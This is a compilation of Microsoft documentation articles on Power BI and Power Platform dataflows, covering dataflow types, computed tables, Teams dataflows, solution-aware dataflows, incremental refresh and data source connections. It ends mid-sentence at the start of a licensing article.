You can create analytical dataflows in Power BI. By default, they'll load data to Power BI’s
managed storage. But you can also configure Power BI to store the data in the
organization’s Azure Data Lake Storage.

You can also create analytical dataflows in the Power Apps and Dynamics 365 Customer Insights portals. When you're creating a dataflow in the Power Apps portal, you can choose between Dataverse managed analytical storage and your organization's Azure Data Lake Storage account.
AI Integration
Sometimes, depending on the requirement, you might need to apply some AI and
machine learning functions on the data through the dataflow. These functionalities are
available in Power BI dataflows and require a Premium workspace.

The following articles discuss how to use AI functions in a dataflow:

Azure Machine Learning integration in Power BI


Cognitive Services in Power BI
Automated Machine Learning in Power BI

Note that the features listed above are Power BI specific and are not available when
creating a dataflow in the Power Apps or Dynamics 365 customer insights portals.

Computed tables
One of the reasons to use a computed table is the ability to process large amounts of
data. The computed table helps in those scenarios. If you have a table in a dataflow,
and another table in the same dataflow uses the first table's output, this action creates a
computed table.

The computed table helps with the performance of the data transformations. Instead of
re-doing the transformations needed in the first table multiple times, the transformation
is done only once in the computed table. Then the result is used multiple times in other
tables.
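
As a rough illustration, a computed table is simply a query whose source is another query in the same dataflow rather than an external data source. In the following hypothetical sketch, OrdersStaging is assumed to be another loaded table in the same dataflow and Amount one of its columns.

```powerquery-m
// Hypothetical example: "OrdersStaging" is another table in the same dataflow.
// Because this query reads from that table's output, the dataflow treats the
// result as a computed table and reuses the already-transformed data.
let
    Source = OrdersStaging,
    HighValueOrders = Table.SelectRows(Source, each [Amount] > 1000)
in
    HighValueOrders
```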

To learn more about computed tables, go to Creating computed tables in dataflows.

Computed tables are available only in an analytical dataflow.

Standard vs. analytical dataflows


The following table lists some differences between a standard table and an analytical
table.
| Operation | Standard | Analytical |
| --- | --- | --- |
| How to create | Power Platform dataflows | Power BI dataflows, or Power Platform dataflows by selecting the Analytical entities only checkbox when creating the dataflow |
| Storage options | Dataverse | Power BI provided Azure Data Lake storage for Power BI dataflows, Dataverse provided Azure Data Lake storage for Power Platform dataflows, or customer provided Azure Data Lake storage |
| Power Query transformations | Yes | Yes |
| AI functions | No | Yes |
| Computed table | No | Yes |
| Can be used in other applications | Yes, through Dataverse | Power BI dataflows: only in Power BI. Power Platform dataflows or Power BI external dataflows: yes, through Azure Data Lake Storage |
| Mapping to standard table | Yes | Yes |
| Incremental load | Default incremental load. Possible to change by using the Delete rows that no longer exist in the query output checkbox at the load settings | Default full load. Possible to set up incremental refresh by configuring incremental refresh in the dataflow settings |
| Scheduled refresh | Yes | Yes, with the possibility of notifying the dataflow owners upon failure |

Scenarios to use each dataflow type


Here are some sample scenarios and best practice recommendations for each type of
dataflow.

Cross-platform usage—standard dataflow


If your plan for building dataflows is to use stored data in multiple platforms (not only
Power BI, but also other Microsoft Power Platform services, Dynamics 365, and so on), a
standard dataflow is a great choice. Standard dataflows store the data in Dataverse,
which you can access through many other platforms and services.

Heavy data transformations on large data tables—analytical dataflow
Analytical dataflows are an excellent option for processing large amounts of data.
Analytical dataflows also enhance the computing power behind the transformation.
Having the data stored in Azure Data Lake Storage increases the writing speed to a
destination. Compared to Dataverse (which might have many rules to check at the time
of data storage), Azure Data Lake Storage is faster for read/write transactions on a large
amount of data.

AI features—analytical dataflow
If you're planning to use any AI functionality through the data transformation stage,
you'll find it helpful to use an analytical dataflow because you can use all the supported
AI features with this type of dataflow.
Create and use dataflows in Microsoft
Power Platform
Article • 04/06/2023

Using dataflows with Microsoft Power Platform makes data preparation easier, and lets
you reuse your data preparation work in subsequent reports, apps, and models.

In the world of ever-expanding data, data preparation can be difficult and expensive,
consuming as much as 60 to 80 percent of the time and cost for a typical analytics
project. Such projects can require wrangling fragmented and incomplete data, complex
system integration, data with structural inconsistency, and a high skillset barrier.

To make data preparation easier and to help you get more value out of your data, Power
Query and Power Platform dataflows were created.

With dataflows, Microsoft brings the self-service data preparation capabilities of Power
Query into the Power BI and Power Apps online services, and expands existing
capabilities in the following ways:

Self-service data prep for big data with dataflows: Dataflows can be used to
easily ingest, cleanse, transform, integrate, enrich, and schematize data from a
large and ever-growing array of transactional and observational sources,
encompassing all data preparation logic. Previously, extract, transform, load (ETL)
logic could only be included within datasets in Power BI, copied over and over
between datasets, and bound to dataset management settings.

With dataflows, ETL logic is elevated to a first-class artifact within Microsoft Power
Platform services, and includes dedicated authoring and management experiences.
Business analysts, BI professionals, and data scientists can use dataflows to handle
the most complex data preparation challenges and build on each other's work,
thanks to a revolutionary model-driven calculation engine, which takes care of all
the transformation and dependency logic—cutting time, cost, and expertise to a
fraction of what's traditionally been required for those tasks. You can create
dataflows by using the well-known, self-service data preparation experience of
Power Query. Dataflows are created and easily managed in app workspaces or
environments, in Power BI or Power Apps, respectively, enjoying all the capabilities
these services have to offer, such as permission management and scheduled
refreshes.

Load data to Dataverse or Azure Data Lake Storage: Depending on your use case,
you can store data prepared by Power Platform dataflows in the Dataverse or your
organization's Azure Data Lake Storage account:

Dataverse lets you securely store and manage data that's used by business
applications. Data within Dataverse is stored in a set of tables. A table is a set of
rows (formerly referred to as records) and columns (formerly referred to as
fields/attributes). Each column in the table is designed to store a certain type of
data, for example, name, age, salary, and so on. Dataverse includes a base set of
standard tables that cover typical scenarios, but you can also create custom
tables specific to your organization and populate them with data by using
dataflows. App makers can then use Power Apps and Power Automate to build
rich applications that use this data.

Azure Data Lake Storage lets you collaborate with people in your organization
using Power BI, Azure Data, and AI services, or using custom-built Line of
Business Applications that read data from the lake. Dataflows that load data to
an Azure Data Lake Storage account store data in Common Data Model folders.
Common Data Model folders contain schematized data and metadata in a
standardized format, to facilitate data exchange and to enable full
interoperability across services that produce or consume data stored in an
organization’s Azure Data Lake Storage account as the shared storage layer.
Advanced Analytics and AI with Azure: Power Platform dataflows store data in
Dataverse or Azure Data Lake Storage—which means that data ingested through
dataflows is now available to data engineers and data scientists to leverage the full
power of Azure Data Services, such as Azure Machine Learning, Azure Databricks,
and Azure Synapse Analytics for advanced analytics and AI. This enables business
analysts, data engineers, and data scientists to collaborate on the same data within
their organization.

Support for Common Data Model: Common Data Model is a set of a standardized
data schemas and a metadata system to allow consistency of data and its meaning
across applications and business processes. Dataflows support Common Data
Model by offering easy mapping from any data in any shape into the standard
Common Data Model entities, such as Account and Contact. Dataflows also land
the data, both standard and custom entities, in schematized Common Data Model
form. Business analysts can take advantage of the standard schema and its
semantic consistency, or customize their entities based on their unique needs.
Common Data Model continues to evolve as part of the Open Data Initiative .

Dataflow capabilities in Microsoft Power Platform services
Most dataflow capabilities are available in both Power Apps and Power BI. Dataflows are
available as part of these services' plans. Some dataflow features are either product-
specific or available in different product plans. The following table describes dataflow
features and their availability.

| Dataflow capability | Power Apps | Power BI |
| --- | --- | --- |
| Scheduled refresh | Up to 48 per day | Up to 48 per day |
| Maximum per entity refresh time | Up to 2 hours | Up to 2 hours |
| Dataflow authoring with Power Query Online | Yes | Yes |
| Dataflow management | In Power Apps admin portal | In Power BI admin portal |
| New connectors | Yes | Yes |
| Standardized schema / built-in support for the Common Data Model | Yes | Yes |
| Dataflows Data Connector in Power BI Desktop | For dataflows with Azure Data Lake Storage as the destination | Yes |
| Integration with the organization's Azure Data Lake Storage | Yes | Yes |
| Integration with Dataverse | Yes | No |
| Dataflow linked entities | For dataflows with Azure Data Lake Storage as the destination | Yes |
| Computed entities (in-storage transformations using M) | For dataflows with Azure Data Lake Storage as the destination | Power BI Premium only |
| Dataflow incremental refresh | For dataflows with Azure Data Lake Storage as the destination; requires Power Apps Plan 2 | Power BI Premium only |
| Running on Power BI Premium capacity / parallel execution of transforms | No | Yes |

Known limitations
Copying dataflows as part of a Power Platform environments copy operation is not
supported.

Next steps
More information about dataflows in Power Apps:

Self-service data prep in Power Apps


Creating and using dataflows in Power Apps
Connect Azure Data Lake Storage Gen2 for dataflow storage
Add data to a table in Dataverse by using Power Query
Visit the Power Apps dataflow community and share what you’re doing, ask
questions, or submit new ideas
Visit the Power Apps dataflow community forum and share what you’re doing, ask
questions, or submit new ideas
More information about dataflows in Power BI:

Self-service data prep in Power BI


Create and use dataflows in Power BI
Dataflows whitepaper
Detailed video of a dataflows walkthrough
Visit the Power BI dataflows community and share what you're doing, ask
questions, or submit new ideas

The following articles go into more detail about common usage scenarios for dataflows.

Using incremental refresh with dataflows


Creating computed entities in dataflows
Connect to data sources for dataflows
Link entities between dataflows

For more information about Common Data Model and the Common Data Model folder
standard, read the following articles:

Common Data Model - overview


Common Data Model folders
Common Data Model folder model file definition
Create and use dataflows in Microsoft
Teams (Preview)
Article • 02/17/2023

Microsoft Dataverse for Teams delivers a built-in, low-code data platform for Microsoft
Teams. It provides relational data storage, rich data types, enterprise-grade governance,
and one-click solution deployment. Dataverse for Teams enables everyone to easily
build and deploy apps.

Previously, the way to get data into Dataverse for Teams was by manually adding data directly into a table. This process can be prone to errors and isn't scalable. But now, with
self-service data prep you can find, clean, shape, and import your data into Dataverse
for Teams.

With your organizational data already sitting in a different location, you can use Power
Query dataflows to directly access your data through the connectors and load the data
into Dataverse for Teams. When your organizational data is updated, you can refresh your dataflows with just one click, and the data in Dataverse for Teams is updated too. You
can also use the Power Query data transformations to easily validate and clean your
data and enforce data quality for your Apps.

Dataflows were introduced to help organizations retrieve data from disparate sources
and prepare it for consumption. You can easily create dataflows using the familiar, self-
service Power Query experience to ingest, transform, integrate, and enrich data. When
creating a dataflow, you'll connect to data, transform the data, and load data into
Dataverse for Teams tables. Once the dataflow is created, it begins the process of
importing data into the Dataverse table. Then you can start building apps to leverage
that data.

Create a dataflow from the dataflows page


In this example, you're going to load data from an Excel file that's located on OneDrive
into Dataverse for Teams.

1. Sign in to the Teams web version, and then select the link for Power Apps.

2. Select the Build tab, and then select Dataflows (Preview).


3. To create a new dataflow, select the New button.

4. Select the Excel workbook connector.


5. Enter a URL address in File path or URL, or use the Browse OneDrive button to
navigate through your OneDrive folders. Select the file you want, and then select
the Next button. For more information about using the OneDrive connection or
getting data, see SharePoint and OneDrive for Business files import or Getting data
from other sources.

6. In Navigator, select the tables that are present in your Excel file. If your Excel file
has multiple sheets and tables, select only the tables you're interested in. When
you're done, select Transform data.

7. Clean and transform your data using Power Query. You can use the out-of-the box
transformations to delete missing values, delete unnecessary columns, or to filter
your data. With Power Query, you can apply more than 300 different
transformations on your data. To learn more about Power Query transformations,
see Use Power Query to transform data. After you're finished with preparing your
data, select Next.

8. In Map tables, select Load to new table to create a new table in Dataverse for
Teams. You can also choose to load your data into an existing table. In the Map
tables screen, you can also specify a Unique primary name column and an
Alternate key column (optional). In this example, leave these selections with the
default values. To learn more about mapping your data and the different settings,
see Field mapping considerations for standard dataflows.
9. Select Create to finish your dataflow. Once you’ve created your dataflow, data
begins loading into Dataverse for Teams. This process can take some time and you
can use the management page to check the status. When a dataflow completes a
run, its data is available to use.

Managing your dataflows


You can manage any dataflow you created from the Dataflows (Preview) tab. Here, you
can see the status of all dataflows, when your dataflow was last refreshed, and take
action from the action bar.

In the Last Refresh column, you can see when your data was last refreshed. If your
refresh failed, an error indication appears. If you select the error indication, the details of
the error and recommended steps to address it appear.

In the Status column, you can see the current status of the dataflow. Possible states are:
Refresh in progress: the dataflow is extracting, transforming, and loading your
data from the source to the Dataverse Tables. This process can take several
minutes depending on the complexity of transformations and data source's
performance. We recommend that you check the status of the dataflow frequently.

To navigate to the action bar, select the three dots “…” next to your dataflow.

Here you can:

Edit your dataflow if you want to change your transformation logic or mapping.
Rename your dataflow. At creation, an autogenerated name is assigned.
Refresh your dataflow. When you refresh your dataflows, the data will be updated.
Delete your dataflow.
Show refresh history. This gives you the results from the last refresh.

Select Show refresh history to see information about the last refresh of your dataflow.
When the dataflow refresh is successful, you can see how many rows were added or
updated in Dataverse. When your dataflow refresh wasn't successful, you can investigate
why with the help of the error message.

Dataflows in Teams is a lightweight version


Dataflows in Teams are a lightweight version of dataflows in the maker portal and can
only load data into Dataverse for Teams. Dataflows in Teams are optimized for a one-
time import of data, but you can refresh your data manually through the refresh button
in the dataflow management page. If you want full dataflows functionality, you can
upgrade your environment.

Supported data sources in dataflows in Teams are:


Excel (OneDrive)
Text/CSV (OneDrive)
PDF (OneDrive)
SharePoint Online Folder
SharePoint Online list
XML (OneDrive)
JSON (OneDrive)
OData
Web API

Note

Dataflows in Teams don't support on-premises data sources, such as on-premises file locations.

The following table lists the major feature differences between dataflows for Dataverse
in Teams and dataflows for Dataverse.

| Dataflow capability | Dataverse for Teams | Dataverse |
| --- | --- | --- |
| Standard dataflows | Yes | Yes |
| Analytical dataflows | No | Yes |
| Gateway support | No | Yes |
| Manual refresh | Yes | Yes |
| Scheduled refresh | No | Yes |
| Incremental refresh | No | Yes |
| Standard tables | No | Yes |
| Custom tables | Yes | Yes |
| Full PQ functionality | Yes | Yes |
| Supported connectors | Subset of connectors | All connectors |
| Small data volumes | Yes | Yes |
| Larger data volumes | No ¹ | Yes |

¹ Although there's no limitation on the amount of data you can load into Dataverse for Teams, for better performance in loading larger amounts of data, we recommend a Dataverse environment.
Consume data from dataflows
Article • 08/04/2023

The ways you can consume data from Microsoft dataflows depend on several factors,
like storage and type of dataflow. In this article, you learn how to choose the right
dataflow for your needs.

Type of dataflow
There are multiple types of dataflows available for you to create. You can choose
between a Power BI dataflow, standard dataflow, or an analytical dataflow. To learn more
about the differences and how to select the right type based on your needs, go to
Understanding the differences between dataflow types.

Storage type
A dataflow can write to multiple output destination types. In short, you should be using
the Dataflows connector unless your destination is a Dataverse table. Then you use the
Dataverse/CDS connector.

Azure Data Lake Storage


Azure Data Lake storage is available in Power BI dataflows and Power Apps analytical
dataflows. By default you're using a Microsoft Managed Data Lake. However, you can
also connect a self-hosted data lake to the dataflow environment. The following articles
describe how to connect the data lake to your environment:

Connect Data Lake Gen 2 storage to a Power BI Workspace


Connect Data Lake Gen 2 storage to a Power Apps Environment

When you've connected your data lake, you should still use the Dataflows connector. If
this connector doesn't meet your needs, you could consider using the Azure Data Lake
connector instead.

Dataverse
A standard dataflow writes the output data to a Dataverse table. Dataverse lets you
securely store and manage data that's used by business applications. After you load
data in the Dataverse table, you can consume the data using the Dataverse connector.
Dataflows can get data from other dataflows
If you'd like to reuse data created by one dataflow in another dataflow, you can do so by
using the Dataflow connector in the Power Query editor when you create the new
dataflow.

When you get data from the output of another dataflow, a linked table is created.
Linked tables provide a way to make data created in an upstream dataflow available in a
downstream dataflow, without copying the data to the downstream dataflow. Because
linked tables are just pointers to tables created in other dataflows, they're kept up to
date by the refresh logic of the upstream dataflow. If both dataflows reside in the same
workspace or environment, those dataflows are refreshed together, to keep data in both
dataflows always up to date. More information: Link tables between dataflows

Separating data transformation from data consumption
When you use the output of a dataflow in other dataflows or datasets, you can create an
abstraction between the data transformation layer and the rest of the data model. This
abstraction is important because it creates a multi-role architecture, in which the Power
Query customer can focus on building the data transformations, and data modelers can
focus on data modeling.

Frequently asked questions


My dataflow table doesn't show up in the dataflow connector in Power BI

You're probably using a Dataverse table as the destination for your standard dataflow.
Use the Dataverse/CDS connector instead or consider switching to an analytical
dataflow.
There's a difference in the data when I remove duplicates in dataflows—how can I
resolve this?

There could be a difference in data between design-time and refresh-time. We don't guarantee which instance is being kept during refresh time. For information that will
help you avoid inconsistencies in your data, go to Working with duplicate values.

Next steps
The following articles provide more details about related articles.

Creating and using dataflows in Power BI


Connect to data created by Power BI dataflows in Power BI Desktop (Beta)
Create and use dataflows in Power Platform
Working with duplicate values in dataflows
Overview of solution-aware dataflows
Article • 03/14/2023

When you include your dataflows in a solution, their definitions become portable,
making it easier to move them from one environment to another, saving time required
to author the dataflow.

A typical use case is for an independent software vendor (ISV) to develop a solution
containing a dataflow that extracts and transforms data from a data source to Dataverse
tables, in a sandbox environment. The ISV would then move that dataflow and
destination tables to a test environment to test with their test data source to validate
that the solution works well and is ready for production. After testing completes, the ISV
would provide the dataflow and tables to clients who will import them into their
production environment to operate on client’s data. This process is much easier when
you add both the dataflows and tables they load data to into solutions, and then move
the solutions and their contents between environments.

Dataflows added to a solution are known as solution-aware dataflows. You can add
multiple dataflows to a single solution.

Note

Only dataflows created in Power Platform environments can be solution-aware.
The data loaded by dataflows to their destination isn't portable as part of
solutions, only the dataflow definitions are. To recreate the data after a
dataflow was deployed as part of a solution, you need to refresh the dataflow.

Add an existing dataflow to a solution


Follow these steps to add a dataflow to a solution.

Prerequisites
You need to have created a solution before you can add a dataflow to it. More
information: Create solutions
You need to be the owner of at least one dataflow in the environment. More
information: Create dataflows
Add the dataflow
1. Sign in to Power Apps .

2. Select Solutions from the navigation bar.

3. Select the solution you'll add your dataflow to, and from the context menu select
Edit.

4. Select Add Existing > Automation > Dataflow.

5. Optional: If your dataflow loads data into a custom Dataverse table, add the
custom table to the solution as well.

In this example, the dataflow you added to the solution loads data into a custom
table called Full Order Details, which you want to also include in the solution with
the dataflow.

Once both the dataflow and table it loads data to are added to the solution, it has
the two artifacts added to the solution. In this case, the artifacts are
cr0c8_FullOrderDetails and Import Sales Data.

To save your work, be sure to publish all customizations. Now, the solution is ready
for you to export from the source environment and import to the destination
environment.

Exporting and importing solutions containing dataflows
Exporting and importing solutions containing dataflows is identical to doing the same
operations for other artifacts. For the most up-to-date instructions, go to the
documentation on exporting and importing solutions.

Updating a dataflow's connections after solution import
For security reasons, credentials of connections used by dataflows aren't persisted by
solutions. Once a dataflow is deployed as part of a solution, you'll need to edit its
connections before it can be scheduled to run.

1. On the left navigation pane, select the down arrow next to Dataverse and select
Dataflows. Identify the dataflow that was imported, and select Edit from the
context menu.

2. In the Dataflow list, locate and double-click the dataflow that was added as part of
the solution you’ve imported.

3. You'll be asked to enter credentials required for the dataflow.

Once the credentials for the connection have been updated, all queries that use
that connection automatically load.

4. If your dataflow loads data in Dataverse tables, select Next to review the mapping
configuration.

5. The mapping configuration is also saved as part of the solution. Since you also
added the destination table to the solutions, there's no need to recreate the table
in this environment and you can publish the dataflow.

That's it. Your dataflow now refreshes and loads data to the destination table.

Known limitations
Dataflows can't be created from within solutions. To add a dataflow to a solution,
follow the steps outlined in this article.
Dataflows can't be edited directly from within solutions. Instead, the dataflow must
be edited in the dataflows experience.
Dataflows can't use connection references for any connector.
Environment variables can't be used by dataflows.
Dataflows don't support adding required components, such as custom tables they
load data to. Instead, the custom table should be manually added to the solution.
Dataflows can't be deployed by application users (service principals).
Incremental refresh configuration isn't supported when deploying solutions. After deployment of the dataflow via solution, the incremental refresh configuration should be reapplied.
Linked tables to other dataflows aren't supported when deploying solutions. After deployment of the dataflow via solution, edit the dataflow and update the connection to the linked dataflow.
Using incremental refresh with
dataflows
Article • 08/04/2023

With dataflows, you can bring large amounts of data into Power BI or your
organization's provided storage. In some cases, however, it's not practical to update a
full copy of source data in each refresh. A good alternative is incremental refresh, which
provides the following benefits for dataflows:

Refresh occurs faster: Only data that's changed needs to be refreshed. For
example, refresh only the last five days of a 10-year dataflow.
Refresh is more reliable: For example, it's not necessary to maintain long-running
connections to volatile source systems.
Resource consumption is reduced: Less data to refresh reduces overall
consumption of memory and other resources.

Incremental refresh is available in dataflows created in Power BI and dataflows created in Power Apps. This article shows screens from Power BI, but these instructions apply to
dataflows created in Power BI or in Power Apps.

Note

When the schema for a table in an analytical dataflow changes, a full refresh takes
place to ensure that all the resulting data matches the new schema. As a result, any
data stored incrementally is refreshed and in some cases, if the source system
doesn't retain historic data, is lost.
Using incremental refresh in dataflows created in Power BI requires that the dataflow
reside in a workspace in Premium capacity. Incremental refresh in Power Apps requires
Power Apps per-app or per-user plans, and is only available for dataflows with Azure
Data Lake Storage as the destination.

In either Power BI or Power Apps, using incremental refresh requires that source data
ingested into the dataflow have a DateTime field on which incremental refresh can filter.

Configuring incremental refresh for dataflows


A dataflow can contain many tables. Incremental refresh is set up at the table level,
allowing one dataflow to hold both fully refreshed tables and incrementally refreshed
tables.

To set up an incrementally refreshed table, start by configuring your table as you would any other table.
After the dataflow is created and saved, select Incremental refresh in the table view,
as shown in the following image.

When you select the icon, the Incremental refresh settings window appears. Turn on
incremental refresh.
The following list explains the settings in the Incremental refresh settings window.

Incremental refresh on/off toggle: Turns the incremental refresh policy on or off
for the table.

Filter field drop-down: Selects the query field on which the table should be filtered
for increments. This field only contains DateTime fields. You can't use incremental
refresh if your table doesn't contain a DateTime field.

Store/refresh rows from the past: The example in the previous image illustrates
these next few settings.

In this example, we define a refresh policy to store five years of data in total and
incrementally refresh 10 days of data. Assuming that the table is refreshed daily,
the following actions are carried out for each refresh operation:

Add a new day of data.


Refresh 10 days, up to the current date.

Remove calendar years that are older than five years before the current date.
For example, if the current date is January 1, 2019, the year 2013 is removed.

The first dataflow refresh might take a while to import all five years, but
subsequent refreshes are likely to be completed much more quickly.

Detect data changes: An incremental refresh of 10 days is much more efficient than a full refresh of five years, but you might be able to do even better. When you select the Detect data changes check box, you can select a date/time column to identify and refresh only the days where the data has changed. This assumes such a column exists in the source system, typically for auditing purposes. The
maximum value of this column is evaluated for each of the periods in the
incremental range. If that data hasn't changed since the last refresh, there's no
need to refresh the period. In the example, this might further reduce the days
incrementally refreshed from 10 to perhaps 2.

 Tip

The current design requires that the column used to detect data changes be
persisted and cached into memory. You might want to consider one of the
following techniques to reduce cardinality and memory consumption:
Persist only the maximum value of this column at time of refresh, perhaps
by using a Power Query function.
Reduce the precision to a level that's acceptable given your refresh-
frequency requirements.

Only refresh complete periods: Imagine that your refresh is scheduled to run at
4:00 AM every day. If data appears in the source system during those first four
hours of that day, you might not want to account for it. Some business metrics,
such as barrels per day in the oil and gas industry, aren't practical or sensible to
account for based on partial days.

Another example where only refreshing complete periods is appropriate is refreshing data from a financial system. Imagine a financial system where data for
the previous month is approved on the 12th calendar day of the month. You can
set the incremental range to one month and schedule the refresh to run on the
12th day of the month. With this option selected, the system will refresh January
data (the most recent complete monthly period) on February 12.
Note

Dataflow incremental refresh determines dates according to the following logic: if a refresh is scheduled, incremental refresh for dataflows uses the time zone defined
in the refresh policy. If no schedule for refreshing exists, incremental refresh uses
the time from the computer running the refresh.

After incremental refresh is configured, the dataflow automatically alters your query to
include filtering by date. If the dataflow was created in Power BI, you can also edit the
automatically generated query by using the advanced editor in Power Query to fine-
tune or customize your refresh. Read more about incremental refresh and how it works
in the following sections.
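
For illustration only, the injected filter is conceptually similar to the following M sketch. The RangeStart and RangeEnd names, the source, and the OrderDate column are assumptions for this example, not the exact code the service generates.

```powerquery-m
// Conceptual sketch of an incremental-refresh date filter (illustrative names and values).
let
    RangeStart = #datetime(2024, 1, 1, 0, 0, 0),    // start of the refresh window
    RangeEnd   = #datetime(2024, 1, 11, 0, 0, 0),   // end of the refresh window
    Source = Sql.Database("myserver.example.com", "SalesDb"),   // hypothetical source
    Orders = Source{[Schema = "dbo", Item = "Orders"]}[Data],
    FilteredRows = Table.SelectRows(
        Orders,
        each [OrderDate] >= RangeStart and [OrderDate] < RangeEnd
    )
in
    FilteredRows
```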

Incremental refresh and linked tables vs.


computed tables
For linked tables, incremental refresh updates the source table. Because linked tables are
simply a pointer to the original table, incremental refresh has no impact on the linked
table. When the source table is refreshed according to its defined refresh policy, any
linked table should assume the data in the source is refreshed.

Computed tables are based on queries running over a data store, which can be another
dataflow. As such, computed tables behave the same way as linked tables.

Because computed tables and linked tables behave similarly, the requirements and
configuration steps are the same for both. One difference is that for computed tables, in
certain configurations, incremental refresh can't run in an optimized fashion because of
the way partitions are built.

Changing between incremental and full refresh


Dataflows support changing the refresh policy between incremental and full refresh.
When a change occurs in either direction (full to incremental or incremental to full), the
change affects the dataflow after the next refresh.

When moving a dataflow from full refresh to incremental, the new refresh logic updates
the dataflow by adhering to the refresh window and increment as defined in the
incremental refresh settings.
When moving a dataflow from incremental to full refresh, all data accumulated in the
incremental refresh is overwritten by the policy defined in the full refresh. You must
approve this action.

Time zone support in incremental refresh


Dataflow incremental refresh is dependent on the time at which it's run. The filtering of
the query is dependent on the day on which it's run.

To accommodate those dependencies and to ensure data consistency, incremental refresh for dataflows implements the following heuristic for refresh now scenarios:

In the case where a scheduled refresh is defined in the system, incremental refresh
uses the time-zone settings from the scheduled refresh section. This ensures that
whatever time zone the person refreshing the dataflow is in, it will always be
consistent with the system's definition.

If no scheduled refresh is defined, dataflows use the time zone from the computer
of the user who's performing the refresh.

Incremental refresh can also be invoked by using APIs. In this case, the API call can hold
a time-zone setting that's used in the refresh. Using APIs can be helpful for testing and
validation purposes.

Incremental refresh implementation details


Dataflows use partitioning for incremental refresh. Incremental refresh in dataflows
keeps the minimum number of partitions to meet refresh policy requirements. Old
partitions that go out of range are dropped, which maintains a rolling window. Partitions
are opportunistically merged, reducing the total number of partitions required. This
improves compression and, in some cases, can improve query performance.

The examples in this section share the following refresh policy:

Store rows in the last 1 Quarter


Refresh rows in the last 10 Days
Detect data changes = False
Only refresh complete days = True

Merge partitions
In this example, day partitions are automatically merged to the month level after they
go outside the incremental range. Partitions in the incremental range need to be
maintained at daily granularity to allow only those days to be refreshed. The refresh
operation with Run Date 12/11/2016 merges the days in November, because they fall
outside the incremental range.

Drop old partitions


Old partitions that fall outside the total range are removed. The refresh operation with
Run Date 1/2/2017 drops the partition for Q3 of 2016 because it falls outside the total
range.

Recovery from prolonged failure


This example simulates how the system recovers gracefully from prolonged failure. Let's
say refresh doesn't run successfully because data source credentials expired, and the
issue takes 13 days to resolve. The incremental range is only 10 days.
The next successful refresh operation, with Run Date 1/15/2017, needs to backfill the
missing 13 days and refresh them. It also needs to refresh the previous nine days
because they weren't refreshed on the normal schedule. In other words, the incremental
range is increased from 10 to 22 days.

The next refresh operation, with Run Date 1/16/2017, takes the opportunity to merge
the days in December and the months in Q4 of 2016.

Dataflow incremental refresh and datasets


Dataflow incremental refresh and dataset incremental refresh are designed to work in
tandem. It's acceptable and supported to have an incrementally refreshing table in a
dataflow, fully loaded into a dataset, or a fully loaded table in a dataflow incrementally
loaded to a dataset.

Both approaches work according to your specified definitions in the refresh settings.
More information: Incremental refresh in Power BI Premium

See also
This article described incremental refresh for dataflows. Here are some more articles that
might be useful:

Self-service data prep in Power BI


Creating computed tables in dataflows
Connect to data sources for dataflows
Link tables between dataflows
Create and use dataflows in Power BI
Using dataflows with on-premises data sources
Developer resources for Power BI dataflows
For more information about Power Query and scheduled refresh, you can read these
articles:

Query overview in Power BI Desktop


Configuring scheduled refresh

For more information about Common Data Model, you can read its overview article:

Common Data Model - overview


Connect to data sources for dataflows
Article • 02/17/2023

With Microsoft Power BI and Power Platform dataflows, you can connect to many
different data sources to create new dataflows, or add new entities to an existing
dataflow.

This article describes how to create dataflows by using these data sources. For an
overview of how to create and use dataflows, go to Creating a dataflow for Power BI
service and Create and use dataflows in Power Apps.

Create a dataflow from a data source


To create a dataflow from a data source, you'll first have to connect to your data.

Power BI service

To connect to data in Power BI:

1. Open a workspace.
2. Select New.
3. Select Dataflow from the drop-down menu.
4. Under Define new tables, select Add new tables.

Data sources for dataflows


Once you've created the dataflow from the dataflow authoring tool, you'll be presented
with the Choose data source dialog box.
Data sources for dataflows are organized into the following categories, which appear as
tabs in the Choose data source dialog box:

All categories
File
Database
Power Platform
Azure
Online Services
Other

For a list of all of the supported data sources in Power Query, go to Connectors in Power
Query.

Connect to a data source


To connect to a data source, select the data source. This section uses one example to
show how the process works, but each data connection for dataflows is similar in
process. Different connectors might require specific credentials or other information, but
the flow is similar. In this example, SQL Server database is selected from the Database
data connection category.
A connection window for the selected data connection is displayed. If credentials are
required, you're prompted to provide them. The following image shows a server and
database being entered to connect to a SQL Server database.

After the server URL or resource connection information is provided, enter the
credentials to use for access to the data. You may also need to enter the name of an on-
premises data gateway. Then select Next.

Power Query Online initiates and establishes the connection to the data source. It then
presents the available tables from that data source in the Navigator window.
You can select tables and data to load by selecting the check box next to each in the left
pane. To transform the data you've chosen, select Transform data from the bottom of
the Navigator window. A Power Query Online dialog box appears, where you can edit
queries and perform any other transformations you want to the selected data.

Connecting to additional data sources


There are additional data connectors that aren't shown in the Power BI dataflows user
interface, but are supported with a few additional steps.
You can take the following steps to create a connection to a connector that isn't
displayed in the user interface:

1. Open Power BI Desktop, and then select Get data.

2. Open Power Query Editor in Power BI Desktop, right-click the relevant query, and
then select Advanced Editor, as shown in the following image. From there, you can
copy the M script that appears in the Advanced Editor window.

3. Open the Power BI dataflow, and then select Get data for a blank query.

4. Paste the copied query into the blank query for the dataflow.
Your script then connects to the data source you specified.
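
As an example of the kind of script you might paste, the following minimal sketch uses the SharePoint folder connector; the site URL and the .csv filter are placeholders for this illustration.

```powerquery-m
// Minimal sketch of a copied query for the SharePoint folder connector.
// Replace the site URL with your own; credentials are supplied when the
// dataflow prompts for them.
let
    Source = SharePoint.Files("https://contoso.sharepoint.com/sites/Sales", [ApiVersion = 15]),
    CsvFiles = Table.SelectRows(Source, each [Extension] = ".csv")
in
    CsvFiles
```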

The following list shows which connectors you can currently use by copying and pasting
the M query into a blank query:

SAP Business Warehouse


Azure Analysis Services
Adobe Analytics
ODBC
OLE DB
Folder
SharePoint Online folder
SharePoint folder
Hadoop HDFS
Azure HDInsight (HDFS)
Hadoop file HDFS
Informix (beta)

Next steps
This article showed which data sources you can connect to for dataflows. The following
articles go into more detail about common usage scenarios for dataflows:

Self-service data prep in Power BI


Using incremental refresh with dataflows
Creating computed entities in dataflows
Link entities between dataflows

For information about individual Power Query connectors, go to the connector reference
list of Power Query connectors, and select the connector you want to learn more about.
Additional information about dataflows and related information can be found in the
following articles:

Create and use dataflows in Power BI


Using dataflows with on-premises data sources
Developer resources for Power BI dataflows
Dataflows and Azure Data Lake integration (Preview)

For more information about Power Query and scheduled refresh, you can read these
articles:

Query overview in Power BI Desktop


Configuring scheduled refresh

For more information about Common Data Model, you can read its overview article:

Common Data Model - overview


What licenses do you need to use
dataflows?
Article • 08/04/2023

Dataflows can be created in different portals, such as Power BI and Power Apps, and
can be of either analytical or standard type. In addition, some dataflow features are only
available as Premium features. Considering the wide range of products that can use
